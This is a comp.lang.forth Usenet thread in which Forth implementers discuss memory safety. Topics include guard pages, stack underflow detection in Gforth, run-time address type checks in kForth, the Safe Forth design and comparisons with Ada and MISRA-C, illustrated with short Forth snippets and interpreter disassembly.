    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to dxf on Sat Mar 2 10:39:23 2024
    dxf <dxforth@gmail.com> writes:
    It's good to have an application that works as planned but how does one
    that misbehaves translate to 'security risk'

    If the misbehaviour is related to the program input, and the input is
    supplied by an attacker, they will look for an input that breaks security.

    and how does 'memory-safe' prevent that?

    "Prevent" is too strong a term, but it helps. A classic attack is when
    you have a memory buffer on the stack, but accesses to it are not bounds checked. That means the attacker can overwrite stuff on the stack after
    the memory buffer, such as the procedure's return address. That means
    the attacker can make the program jump to the location of their choice,
    i.e. a location containing a security attack. See:

    https://en.wikipedia.org/wiki/Return-oriented_programming

    That may be their belief (fancy word for hope) but do they have anything
    to back it up?

    It's unclear what they mean, but it's certainly the case that studying
    the historical corpus of CVE's tells us things about common types of
    attacks. That tells us what areas need attention.

    Regarding runtime checks: in C++, if you access an array as a[i], there
    is no runtime check and thus there is a potential out-of-range memory
    access. If you instead say a.at(i), there is a runtime check, so you
    get the right result if the index is in range, but raise an exception otherwise. What I've found in practice is that there is almost no
    slowdown. I suspect that the memory access itself is slower than the
    range check, even when it usually is within the cpu cache. So this says runtime checks are usually worth the small cost.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Krishna Myneni on Sat Mar 2 18:03:32 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    Does this mean Gforth is
    immune to arbitrary code execution attacks for the fp and data stack
    overflow and underflow conditions?

    Technically, one might answer "yes", but there are stack depth
    violations that don't result in a stack overflow or underflow, and
    that can lead to arbitrary code execution in Gforth. A simple example
    is:

    : bla ." bla" ;

    : foo >r ;

    ' bla >body foo \ prints "bla"

    Essentially, there is far too few guardrails in Gforth for the guard
    pages to provide significant safety. For Gforth they are just a
    convenience feature.

    However, the idea of Safe Forth is to eliminate all these other ways
    towards arbitrary code execution, and in Safe Forth the guard pages
    will close the hole that stack overflows and underflows would
    otherwise leave open.

    Note that guard pages require OS support; Gforth uses the mprotect()
    system call (of modern (since ~1990) Unix systems) for that.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to All on Sat Mar 2 19:47:05 2024
    You can compile in DEBUG/RELEASE mode, whereby runtime checks
    are no longer included in RELEASE mode. But these are quasi
    pre-mortem traps, just like guard pages - they do not make Forth
    safer as a language, for that it would need a-priori error traps.

    An example:

    : TE1 -1 dup c! ;

    TE1 contains two errors: -1 is not a char and -1 is not a permitted
    memory address. It must be possible to catch these during compilation.

    Even the so vulnerable language C has assert macros for compiling
    in DEBUG mode. In Forth, you have to create asserts yourself.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to minforth on Sat Mar 2 22:29:49 2024
    minforth@gmx.net (minforth) writes:
    In Forth, you have to create asserts yourself.

    Or you can use Gforth, which has them since at least gforth-0.2
    (released 1996). See <https://gforth.org/manual/Assertions.html#index-assert_0028>.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Paul Rubin on Sat Mar 2 22:21:19 2024
    Paul Rubin <no.email@nospam.invalid> writes:
    It's unclear what they mean, but it's certainly the case that studying
    the historical corpus of CVE's tells us things about common types of
    attacks. That tells us what areas need attention.

    My impression from reading articles like
    <https://lwn.net/Articles/961978/> and the discussions after them is
    that in recent years CVEs have become a metric for evaluating security researchers, and, like any other metric, are therefore gamed. So
    these days a statistic about CVEs tells us only what kind of bugs
    which are assumed to be vulnerabilities are most often found by those researchers.

    What I've found in practice is that there is almost no
    slowdown. I suspect that the memory access itself is slower than the
    range check, even when it usually is within the cpu cache.

    On a modern OoO processor, if the program is dependence-bound rather
    than resource-bound, the instructions for the range check cost very
    little, because they do not add to the dependence chains in the usual
    case (when the access is in range).

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to Anton Ertl on Sat Mar 2 17:07:02 2024
    On 3/2/24 10:43, Anton Ertl wrote:
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    On 3/2/24 10:08, Krishna Myneni wrote:
    === Gforth example ===
    : rt1 recurse ;  ok
    rt1
    *the terminal*:2:1: error: Return stack overflow
    >>>rt1<<<
    === end example ===


    To be clear, if you try to fill up the fp or data stack, as with your
    rt1 example, kForth does give a segfault (and hence is susceptible to an
    exploit), while Gforth still gives the same error.

    In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
    into a guard page. The signal handler then looks at the offending
    address, and guesses that an access close to the bottom of a stack is
    an underflow of that stack, and correspondingly for accesses close to
    the top of a stack. This can be seen as follows:

    With the gforth engine with the FP stack being empty:

    fp@ 32769 - c@
    *the terminal*:3:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<
    fp@ 1+ c@
    *the terminal*:4:8: error: Floating-point stack underflow
    fp@ 1+ >>>c@<<<


    In the version of Gforth which I have (0.7.9_20220120),

    fp@ 32769 - c@
    *the terminal*:5:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<

    However,

    fp@ 65536 - c@ ok 1

    and, worse,

    1 fp@ 65536 - c! ok

    So the guard pages are not a solution to pointer arithmetic bugs with
    the stack pointers.

    To make stack access memory safe, there has to be bounds checks on
    reading and writing from/to stacks. This suggests that stacks should be
    arrays and stack operations always involve array read/write from arrays
    with enforced bounds checking e.g. something like

    : DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
    : OVER STACK[ tos 1+ ]@ ;

    etc. and ]@ and ]! performs bounds checks.

    I haven't yet looked at your paper on SafeForth.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Ron AARON@21:1/5 to Krishna Myneni on Sun Mar 3 07:54:49 2024
    One of the criteria for 8th was security -- among other things, making
    it very difficult to do unsafe memory operations. Within 8th itself you
    can't; but of course, with the FFI anything is possible.

    On 01/03/2024 17:54, Krishna Myneni wrote:
    I'm wondering what the CS Forth users and Forth systems developers make
    of the renewed recent push for use of memory-safe languages. Certainly
    Forth can add the type of contractual safety requirements e.g.,
    implementing bounds checking, of a "memory-safe language". Do we need to
    work on libraries for these provisions?

    Opinions?

    --
    Krishna Myneni


    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Krishna Myneni on Sun Mar 3 07:25:20 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    On 3/2/24 10:43, Anton Ertl wrote:
    With the gforth engine with the FP stack being empty:

    fp@ 32769 - c@
    *the terminal*:3:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<
    fp@ 1+ c@
    *the terminal*:4:8: error: Floating-point stack underflow
    fp@ 1+ >>>c@<<<


    In the version of Gforth which I have (0.7.9_20220120),

    fp@ 32769 - c@
    *the terminal*:5:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<

    However,

    fp@ 65536 - c@ ok 1

    and, worse,

    1 fp@ 65536 - c! ok

    So the guard pages are not a solution to pointer arithmetic bugs with
    the stack pointers.

    Yes, that is not their intention and not the intention of these
    examples. The intention of these examples is to show that any memory
    access will be interpreted as a stack underflow or overflow if it is
    to a certain range of addresses.

    A more serious issue is that, as implemented in Gforth (in particular, gforth-fast), stack underflows can be undetected in some cases: On
    Gforth on an AMD64 system, with the data stack being empty:

    600 pick ok 1

    On gforth-fast, with the data stack being empty:

    : foo 600 0 ?do nip loop cr . ; foo
    0
    *the terminal*:1:33: error: Stack underflow
    : foo 600 0 ?do nip loop cr . ; >>>foo<<<
    Backtrace:
    kernel/basics.fs:312:27: 0 $7F30E3BDFE10 throw

    Note that FOO actually performs the "cr .", so the stack underflow is
    not detected by an access to the the guard page. Instead, the text
    interpreter checks the stack pointer and reports a stack underflow.
    The non-detection of the stack underflow is because NIP is implemented
    as:

    $7F30E3C72C90 nip 1->1
    7F30E3917557: add r13,$08 #update sp

    With the gforth engine, a similar scenario (involving DROP) is avoided
    because in this engine DROP loads the value being dropped exactly to
    trigger stack underflow reports where they happen:

    $7F55EBFA6C98 drop 0->0
    7F55EBAC51C0: mov $50[r13],r15 #save ip (for accurate backtraces) 7F55EBAC51C4: add r15,$08 #update ip
    7F55EBAC51C8: mov rax,[r14] #load dropped value
    7F55EBAC51CB: add r14,$08 #update sp

    Neither the deep PICK nor the loop that just NIPs or DROPs occur in
    practice.

    The motivation for the otherwise unnecessary load in DROP (in gforth)
    is code sequences like

    drop 1

    in cases where the stack is empty. The load in DROP results in
    detecting the stack underflow at the DROP rather than at the "1".
    Reporting a stack underflow at an operation that just pushes can
    produce a WTF moment in the programmer; the gforth engine exists to
    make debugging easier, and that includes avoiding such moments.

    To make stack access memory safe, there has to be bounds checks on
    reading and writing from/to stacks. This suggests that stacks should be >arrays and stack operations always involve array read/write from arrays
    with enforced bounds checking e.g. something like

    : DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
    : OVER STACK[ tos 1+ ]@ ;

    etc. and ]@ and ]! performs bounds checks.

    With guard pages, that's not necessary. The normal bounded-depth
    stack accesses (of words like 2DROP or 2OVER) are sure to hit the
    guard pages if the stack is out-of-bounds; you may want to perform an
    otherwise unnecessary load on words like NIP, DROP, 2DROP etc. that do
    not otherwise use (and thus load) the stack values that they consume,
    but that's much cheaper than putting bounds checks on every stack
    access. For unbounded stack-access words like PICK, a bounds check is appropriate.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to All on Sun Mar 3 08:21:30 2024
    You can run around in circles here, the basic problem is that there is
    no formal specification for what a safe programming language is.
    Analyses on the subject are dominated by the following: Memory errors,
    type errors, range errors, race condition errors.

    In order to develop Forth more in this direction, we would first need
    a specification on "Hardened Forth" that is dedicated to these error
    areas - and also marks UBs with defined exception codes. Ideally
    accompanied by a test suite so that every Forth system developer can
    check their own system.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to minforth on Sun Mar 3 07:03:01 2024
    On 3/2/24 13:47, minforth wrote:
    You can compile in DEBUG/RELEASE mode, whereby runtime checks
    are no longer included in RELEASE mode. But these are quasi
    pre-mortem traps, just like guard pages - they do not make Forth
    safer as a language, for that it would need a-priori error traps.

    An example:

    : TE1 -1 dup c! ;

    TE1 contains two errors: -1 is not a char and -1 is not a permitted
    memory address. It must be possible to catch these during compilation.

    kForth, from its beginning, would never execute the C! in your example:

    Ready!
    : TE1 -1 dup c! ;
    ok
    TE1
    Line 2: VM Error(-256): Not data type ADDR
    TE1

    It performs run-time type checking for address arguments, at about 15%
    cost in speed for most benchmarks.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to minforth on Sun Mar 3 07:07:07 2024
    On 3/3/24 02:21, minforth wrote:
    You can run around in circles here, the basic problem is that there is
    no formal specification for what a safe programming language is.
    Analyses on the subject are dominated by the following: Memory errors,
    type errors, range errors, race condition errors.

    In order to develop Forth more in this direction, we would first need
    a specification on "Hardened Forth" that is dedicated to these error
    areas - and also marks UBs with defined exception codes. Ideally
    accompanied by a test suite so that every Forth system developer can
    check their own system.

    I'm not smart enough for a top down approach to this problem. The Forth approach is one that I can take though. Start with small well-defined
    problems, and try to find solutions for those. Build up a bigger picture
    from those solutions.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to Anton Ertl on Sun Mar 3 06:58:02 2024
    On 3/3/24 01:25, Anton Ertl wrote:
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    On 3/2/24 10:43, Anton Ertl wrote:
    With the gforth engine with the FP stack being empty:

    fp@ 32769 - c@
    *the terminal*:3:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<
    fp@ 1+ c@
    *the terminal*:4:8: error: Floating-point stack underflow
    fp@ 1+ >>>c@<<<


    In the version of Gforth which I have (0.7.9_20220120),

    fp@ 32769 - c@
    *the terminal*:5:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<

    However,

    fp@ 65536 - c@ ok 1

    and, worse,

    1 fp@ 65536 - c! ok

    So the guard pages are not a solution to pointer arithmetic bugs with
    the stack pointers.

    Yes, that is not their intention and not the intention of these
    examples. The intention of these examples is to show that any memory
    access will be interpreted as a stack underflow or overflow if it is
    to a certain range of addresses.

    A more serious issue is that, as implemented in Gforth (in particular, gforth-fast), stack underflows can be undetected in some cases: On
    Gforth on an AMD64 system, with the data stack being empty:

    600 pick ok 1

    On gforth-fast, with the data stack being empty:

    : foo 600 0 ?do nip loop cr . ; foo
    0
    *the terminal*:1:33: error: Stack underflow
    : foo 600 0 ?do nip loop cr . ; >>>foo<<<
    Backtrace:
    kernel/basics.fs:312:27: 0 $7F30E3BDFE10 throw

    Note that FOO actually performs the "cr .", so the stack underflow is
    not detected by an access to the the guard page. Instead, the text interpreter checks the stack pointer and reports a stack underflow.
    The non-detection of the stack underflow is because NIP is implemented
    as:

    $7F30E3C72C90 nip 1->1
    7F30E3917557: add r13,$08 #update sp

    With the gforth engine, a similar scenario (involving DROP) is avoided because in this engine DROP loads the value being dropped exactly to
    trigger stack underflow reports where they happen:

    $7F55EBFA6C98 drop 0->0
    7F55EBAC51C0: mov $50[r13],r15 #save ip (for accurate backtraces) 7F55EBAC51C4: add r15,$08 #update ip
    7F55EBAC51C8: mov rax,[r14] #load dropped value
    7F55EBAC51CB: add r14,$08 #update sp

    Neither the deep PICK nor the loop that just NIPs or DROPs occur in
    practice.

    The motivation for the otherwise unnecessary load in DROP (in gforth)
    is code sequences like

    drop 1

    in cases where the stack is empty. The load in DROP results in
    detecting the stack underflow at the DROP rather than at the "1".
    Reporting a stack underflow at an operation that just pushes can
    produce a WTF moment in the programmer; the gforth engine exists to
    make debugging easier, and that includes avoiding such moments.

    To make stack access memory safe, there has to be bounds checks on
    reading and writing from/to stacks. This suggests that stacks should be
    arrays and stack operations always involve array read/write from arrays
    with enforced bounds checking e.g. something like

    : DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
    : OVER STACK[ tos 1+ ]@ ;

    etc. and ]@ and ]! performs bounds checks.

    With guard pages, that's not necessary. The normal bounded-depth
    stack accesses (of words like 2DROP or 2OVER) are sure to hit the
    guard pages if the stack is out-of-bounds; you may want to perform an otherwise unnecessary load on words like NIP, DROP, 2DROP etc. that do
    not otherwise use (and thus load) the stack values that they consume,
    but that's much cheaper than putting bounds checks on every stack
    access. For unbounded stack-access words like PICK, a bounds check is appropriate.


    That's a pretty good approach, to use guard pages for stack access words
    which are guaranteed to trigger a signal, and use bounds checking for
    the remaining ones.

    The intent of the stack array access was to avoid stack pointer
    arithmetic altogether. Stack array access words provide a safe alternate
    to doing stack pointer arithmetic in Forth code. Pointer arithmetic
    appears to be the source of a lot of memory safety problems.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to All on Sun Mar 3 16:08:26 2024
    That's patchwork, but if it is sufficient for a program,
    good for the program. As for language safety....

    For instance, I wouldn't define how to react on
    0 BASE !
    that could lead to a plethora of system-dependent crashes.
    Or on
    -1. 3 UM/MOD
    probably throw exception code -11 for result out of range
    even when 'range' is undeclared or only implicit.

    OTOH I doubt that there is any demand for a paranoia Forth
    with safety belts and suspenders and alarm whistles.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Krishna Myneni on Sun Mar 3 15:51:07 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    The intent of the stack array access was to avoid stack pointer
    arithmetic altogether. Stack array access words provide a safe alternate
    to doing stack pointer arithmetic in Forth code. Pointer arithmetic
    appears to be the source of a lot of memory safety problems.

    At the machine level and the standard Forth level, every array access
    performs address arithmetics. Given that standard Forth does not
    expose the implementation of the stacks, there is no need to use some
    specific implementation for them. One may wonder, though, if using 4
    stacks with guard pages around them (i.e., at least 9 pages per task,
    set up with 6 system calls) is too expensive for multi-tasking; I
    think Gforth currently only does it for the main task.

    There are architectures (in particular, the 80286) that provide
    hardware support for treating stretches of memory as segments with
    bounds checking, and the idea probably was that every array becomes a
    segment (not sure about structures; the 80286 supports only 8192
    segments, which seems a little low if every struture needs a segment),
    but anyway, using segments was too cumbersome, slow and limited, so
    they have been let slide by the wayside in the descendents of the
    architecture (IA-32, AMD64).

    In any case, yes, in Safe Forth there are no addresses at the language
    level. You have objects with value-flavoured fields, and arrays with indexed-fetch and indexed-store words. But in the implementation of
    Safe Forth, there will certainly be address arithmetics.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to minforth on Sun Mar 3 16:14:27 2024
    minforth@gmx.net (minforth) writes:
    You can run around in circles here, the basic problem is that there is
    no formal specification for what a safe programming language is.

    It was certainly an interesting aspect of my work on Safe Forth that I
    first had to understand better what memory safety is; I had the "I
    know it when I see it" kind of understanding, but that was not enough.
    But I succeeded in understanding it better, and you can read the paper
    if you want to know more about it.

    Analyses on the subject are dominated by the following: Memory errors,
    type errors, range errors, race condition errors.

    Safe Forth only tries to solve memory errors. That makes it necessary
    to deal with some type errors and some range errors, but not all of
    them, and there are no ambitions at the moment to harden Safe Forth
    more against those. My idea on how to perform multitasking in Safe
    Forth does not provide shared memory, so there are no race conditions.

    In order to develop Forth more in this direction, we would first need
    a specification on "Hardened Forth" that is dedicated to these error
    areas - and also marks UBs with defined exception codes.

    I know "UB" from the C language lawyers. They love the concept of
    "undefined behaviour" so much that they have created a 2-letter
    acronym for it. A safe language does not have undefined behaviour,
    and if you define the behaviour on some kind of condition to perform
    an exception, that behaviour is certainly not undefined.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to minforth on Sun Mar 3 11:32:46 2024
    minforth@gmx.net (minforth) writes:
    You can run around in circles here, the basic problem is that there is
    no formal specification for what a safe programming language is.

    From https://en.wikipedia.org/wiki/Ada_(programming_language)#History :

    HOLWG crafted the Steelman language requirements, a series of
    documents stating the requirements they felt a programming language
    should satisfy. Many existing languages were formally reviewed, but
    the team concluded in 1977 that no existing language met the
    specifications.

    They put out for proposals for a new language to be designed. The
    eventual winner was Ada, but that choice came with some controversy at
    the time. There were competing proposals that some people felt were
    less bloated and still fulfilled the intended goals.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to All on Sun Mar 3 19:56:44 2024
    Don't look elsewhere for UBs, the Forth Standard is shock full of "ambiguous conditions"

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Paul Rubin on Sun Mar 3 20:00:27 2024
    Paul Rubin wrote:
    They put out for proposals for a new language to be designed. The
    eventual winner was Ada, but that choice came with some controversy at
    the time. There were competing proposals that some people felt were
    less bloated and still fulfilled the intended goals.

    Misra-C is an example. There is no language specification, but quite a
    number of rules against which a C program can be checked.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to minforth on Sun Mar 3 14:08:29 2024
    minforth@gmx.net (minforth) writes:
    Misra-C is an example. There is no language specification, but quite a
    number of rules against which a C program can be checked.

    Misra-C has some sensible rules, but it's still C, which comes nowhere
    near meeting the requirements that the working group (that chose Ada)
    was looking for. Maybe some subset of C++ could have done done it.
    C doesn't have nearly enough type safety.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to minforth on Sun Mar 3 17:02:44 2024
    On 3/3/24 10:08, minforth wrote:
    That's patchwork, but if it is sufficient for a program,
    good for the program. As for language safety....

    ...
    OTOH I doubt that there is any demand for a paranoia Forth
    with safety belts and suspenders and alarm whistles.

    Perhaps not, but I wrote my Forth system to provide some hand-holding, primarily for my own needs. My expectation is that the demand for Forth
    systems which don't address safety concerns will rapidly drop to zero.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Ron AARON@21:1/5 to dxf on Mon Mar 4 07:06:42 2024
    On 04/03/2024 3:10, dxf wrote:
    On 3/03/2024 4:54 pm, Ron AARON wrote:
    One of the criteria for 8th was security -- among other things, making it very difficult to do unsafe memory operations.

    Has it paid off - by which I mean completed apps that out of the blue access invalid memory? I'm curious as to what exactly is behind the high rate of 'memory errors' that govt et al is reporting because in my limited experience programming in Forth, I'm just not seeing any. I wonder if it has something to do with the practices employed in those other languages - such as the use of third-party libraries which programmers use essentially on faith.

    That's a good question, for which I don't have an answer nor even any
    metrics on which to base one.

    While I, personally, rarely write code that has those sorts of issues
    (at least, not in 30 years), I have worked in places where they were
    fairly common. It depends a lot on the expertise and attention to detail
    of the programmers, I think.

    Since 8th is intended for "application programmers" who may have little experience, and since one of its primary goals is "security", I've made
    it difficult to smash memory -- whether on purpose or accidentally. Of
    course, that makes it stray considerably from standard Forths.

    TL;DR: I don't really know.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Krishna Myneni on Mon Mar 4 07:52:28 2024
    Krishna Myneni wrote:

    On 3/3/24 10:08, minforth wrote:
    OTOH I doubt that there is any demand for a paranoia Forth
    with safety belts and suspenders and alarm whistles.

    Perhaps not, but I wrote my Forth system to provide some hand-holding, primarily for my own needs. My expectation is that the demand for Forth systems which don't address safety concerns will rapidly drop to zero.

    IIRC there have been a few Forth applications at NASA and for astronomy
    (e.g. see Forth Inc. web site). I've already wondered how much convincing
    had to be done for NASA not to disqualify Forth.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Ron AARON on Mon Mar 4 07:39:36 2024
    Ron AARON wrote:
    While I, personally, rarely write code that has those sorts of issues
    (at least, not in 30 years), I have worked in places where they were
    fairly common. It depends a lot on the expertise and attention to detail
    of the programmers, I think.

    I think it's also a question of the scale of the software. Forth programs
    are usually microscopically small and manageable. Typical modern software
    can reach gigabytes and must be created by a team of developers who sometimes don't even work in the same place. The attack surface for errors is therefore orders of magnitude larger. Then there is a need for many more a-priori security functions already in the programming language and development tools, followed by software engineering test procedures.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Ron AARON@21:1/5 to minforth on Mon Mar 4 10:13:06 2024
    On 04/03/2024 9:39, minforth wrote:
    Ron AARON wrote:
    While I, personally, rarely write code that has those sorts of issues
    (at least, not in 30 years), I have worked in places where they were
    fairly common. It depends a lot on the expertise and attention to
    detail of the programmers, I think.

    I think it's also a question of the scale of the software. Forth programs
    are usually microscopically small and manageable. Typical modern software
    can reach gigabytes and must be created by a team of developers who
    sometimes
    don't even work in the same place. The attack surface for errors is
    therefore
    orders of magnitude larger. Then there is a need for many more a-priori security functions already in the programming language and development
    tools,
    followed by software engineering test procedures.

    Yes, this too. Even when people are all in the same location, getting
    everyone to work in the same direction and same style and follow the
    rules can be challenging.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to dxf on Mon Mar 4 07:57:14 2024
    dxf <dxforth@gmail.com> writes:
    Has it paid off - by which I mean completed apps that out of the blue access >invalid memory?

    Out of the blue? That's not how it happens.

    I'm curious as to what exactly is behind the high rate of
    'memory errors' that govt et al is reporting because in my limited experience >programming in Forth, I'm just not seeing any.

    If you don't look, or if you look in the wrong place, you don't see.
    The fact that a primitive technique like throwing random input at a
    program caused many supposedly-debugged programs to misbehave shows
    that programmers have blind spots, especially when it comes to their
    own programs. And this has nothing to do with "gigabytes of
    software", this was already found at times when machines were so small
    that sizes of large programs were on the order of kilowords <https://en.wikipedia.org/wiki/Fuzzing#Early_random_testing>.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to dxf on Mon Mar 4 11:06:05 2024
    dxf wrote:

    What do I use while developing a recursive function: ?STACK.

    Yes and no:

    Gforth 0.7.9_20200709
    Authors: Anton Ertl, Bernd Paysan, Jens Wilke et al., for more type `authors' Copyright © 2019 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html> Gforth comes with ABSOLUTELY NO WARRANTY; for details type `license'
    Type `help' for basic help
    drop depth
    *the terminal*:1:1: error: Stack underflow
    drop<<< depth
    : TEST drop depth ; ok
    test <<<--- CRASH!!

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to minforth on Mon Mar 4 07:06:38 2024
    On 3/4/24 01:52, minforth wrote:
    Krishna Myneni wrote:

    On 3/3/24 10:08, minforth wrote:
    OTOH I doubt that there is any demand for a paranoia Forth
    with safety belts and suspenders and alarm whistles.

    Perhaps not, but I wrote my Forth system to provide some hand-holding,
    primarily for my own needs. My expectation is that the demand for
    Forth systems which don't address safety concerns will rapidly drop to
    zero.

    IIRC there have been a few Forth applications at NASA and for astronomy
    (e.g. see Forth Inc. web site). I've already wondered how much convincing
    had to be done for NASA not to disqualify Forth.

    The trend has been to go to "memory-safe" languages. There are many
    instances in which simple run-time type checking for addresses have
    resulted in saving me considerable debugging time -- usually just stack
    order is incorrect, but the error can manifest in more complex ways as well.

    I don't have any particular insight into the trends other than following
    the news. I think there will be even greater pressure going forward to
    use memory-safe languages for internet facing applications. The shift in academia towards those languages appears to have already happened. My daughter's first year CS class uses python.

    --
    Krishna

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Krishna Myneni on Mon Mar 4 14:20:09 2024
    Krishna Myneni wrote:

    On 3/4/24 01:52, minforth wrote:
    Krishna Myneni wrote:

    On 3/3/24 10:08, minforth wrote:
    OTOH I doubt that there is any demand for a paranoia Forth
    with safety belts and suspenders and alarm whistles.

    Perhaps not, but I wrote my Forth system to provide some hand-holding,
    primarily for my own needs. My expectation is that the demand for
    Forth systems which don't address safety concerns will rapidly drop to
    zero.

    IIRC there have been a few Forth applications at NASA and for astronomy
    (e.g. see Forth Inc. web site). I've already wondered how much convincing
    had to be done for NASA not to disqualify Forth.

    The trend has been to go to "memory-safe" languages. There are many
    instances in which simple run-time type checking for addresses have
    resulted in saving me considerable debugging time -- usually just stack
    order is incorrect, but the error can manifest in more complex ways as well.

    I don't have any particular insight into the trends other than following
    the news. I think there will be even greater pressure going forward to
    use memory-safe languages for internet facing applications. The shift in academia towards those languages appears to have already happened.

    This is why web assembly is on the rise. Many languages can already be
    compiled to wasm. See
    https://webassembly.org/docs/security/

    However, I found only a few wasm-based Forths on the net.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to dxf on Mon Mar 4 12:23:04 2024
    dxf <dxforth@gmail.com> writes:
    Has it paid off - by which I mean completed apps that out of the blue
    access invalid memory?

    It could be that catching more of those errors during development means
    fewer make it out to deployment.

    I'm curious as to what exactly is behind the high rate of 'memory
    errors' that govt et al is reporting because in my limited experience programming in Forth, I'm just not seeing any.

    The programs with the memory errors are likely more complicated than
    typical Forth programs, deal with more maliciously crafted inputs, and
    make heavier use of dynamic memory allocation than small embedded
    programs are likely to. My own Forth experience is even more limited,
    but in it, I haven't even used arrays very much, especially for
    user-supplied data.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to minforth on Mon Mar 4 12:17:12 2024
